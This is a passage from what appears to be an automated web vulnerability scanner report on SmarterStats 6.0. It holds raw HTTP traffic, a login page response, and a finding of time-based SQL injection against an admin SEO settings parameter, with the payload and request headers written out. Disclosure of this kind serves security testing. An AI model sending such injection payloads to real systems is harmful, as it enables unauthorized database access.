R1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAApATG9nU3RhdHVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAMTG9nU3RhdHVzVGFiC2QFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYZBSRjdGwwMCRNUEgkY2hrU2VvRW5hYmxlZF9TZXR0aW5nQ2hlY2sFKGN0bDAwJE1QSCRjaGtTdHJpcEFmdGVyU2VtaV9TZXR0aW5nQ2hlY2sFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTQPMtQLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdATG9nRlRQAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAJTG9nRlRQVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBRljdGwwMCRNUEgkUGFnZUlkZW50aWZpZXIxDwUgNGZlNTRjNDQyMWIwNGU1YTk3NWFhNjliOWNjY2M4MTBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:47:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFZGh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPURBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPUxvZ2luQWRtaW5kZAIHDw8WCB4ISW1hZ2VVcmwFBi9zLmdpZh4FV2lkdGgbAAAAAAAAAAABAAAAHgZIZWlnaHQbAAAAAAAAAAABAAAAHgRfIVNCAoADZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNrgL28FyeT2FgfCJoS9qDlIS48UTYZAhilwpmMjFTmvVI=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

